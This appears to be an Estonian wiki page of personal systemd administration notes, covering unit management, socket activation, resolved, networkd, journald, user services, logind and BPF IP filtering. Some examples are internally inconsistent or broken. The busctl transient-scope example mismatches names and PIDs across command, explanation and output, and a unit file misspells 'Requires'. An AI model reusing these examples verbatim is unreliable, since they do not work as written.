[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===systemd-cat===

TODO

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

dbus kaudu scope kapslis protsessi töötamine, käivitada protsess

<pre>
root@systemd-02:~# sleep 300 &
[1] 9261
</pre>

Seostada protsess eraldi moodustatud systemd slice osakonnaga

<pre>
root@systemd-02:~# busctl call org.freedesktop.systemd1 \
/org/freedesktop/systemd1 \
org.freedesktop.systemd1.Manager \
StartTransientUnit \
"ssa(sv)a(sa(sv))" \
"real-server-mimic.scope" \
"fail" \
2 "Slice" "s" "custom-labs-01.slice" "PIDs" "au" 1 8702 \
0
o "/org/freedesktop/systemd1/job/62153"
</pre>

kus

* org.freedesktop.systemd1 /org/freedesktop/systemd1: The destination path pointing directly to systemd's primary system core.
* StartTransientUnit: The literal internal API function name.
* "ssa(sv)a(sa(sv))": The explicit structural signature definition. It alerts systemd to expect: String, String, Array of Variants, and a nested Array of auxiliary configurations.
* "my-direct-dbus.scope": The custom name for the new leaf node container.
* "fail": The conflict mode. It instructs systemd: "If a scope with this exact name already exists, throw an error instead of overriding it."
* 2 "Slice" "s" "custom-labs-01.slice" "PIDs" "au" 1 8620: This tells systemd we are supplying 2 properties inside our payload array:

Set the target Slice property to the string value "custom-labs-01.slice".

Populate the PIDs property array with an active array size of 1, passing our target PID unsigned integer value (8620).

* 0: Passes an empty auxiliary parameters list.

tulemuse kontrolliks

<pre>
root@systemd-02:~# systemd-cgls /custom.slice
CGroup /custom.slice:
└─custom-labs.slice
└─custom-labs-02.slice
└─real-server-02.scope
└─9261 sleep 300
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-hostnamed===

Väited

* busctl käivitab systemd-hostnamed protsessi ajutiselt vastavalt vajadusele
* ta on 'D-Bus On-Demand Activated Service' ehk 'Transient/Ephemeral Daemon' ehk 'Lazy-Loaded / Socket-Activated Daemon'

Muudatuse tegemiseks sobib öelda

<pre>
root@ns-pg-01:~# hostnamectl set-hostname ns-pg-01
</pre>

kus

* muudetakse /etc/hostname fail
* ei muudeta /etc/hosts faili
* väidetavalt teavitatakse syslog jt deemoneid st restart vms ei ole vajalik arvutile
* reaalselt süsteemi hostname muutmisel hostnamectl programmist väga palju abi ei ole, /etc/hosts fail tuleb käsitsi muuta

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
